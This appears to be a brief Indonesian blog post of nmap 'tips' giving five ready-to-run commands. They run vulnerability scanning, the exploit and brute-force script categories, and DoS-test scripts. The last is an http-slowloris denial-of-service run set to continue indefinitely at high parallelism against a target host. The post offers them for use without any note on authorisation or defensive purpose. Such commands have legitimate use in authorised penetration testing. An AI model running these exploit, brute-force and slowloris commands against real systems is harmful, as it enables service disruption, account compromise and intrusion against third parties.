15 February 2020

nmap: 5 tips untuk scan


Vuln scanner
nmap -Pn --script vuln <host/ip> <enter>

Exploit
nmap --script exploit -Pn <host/ip> <enter>

BruteForce
nmap --script brute -Pn <host/ip> <enter>

Test dos Vuln
nmap --script dos -Pn <host/ip> <enter>

dos http-slowloris
nmap --max-parallelism 750 -Pn --script http-slowloris --script-args http-slowloris.runforever=true <host/ip> <enter>

No comments:

Post a Comment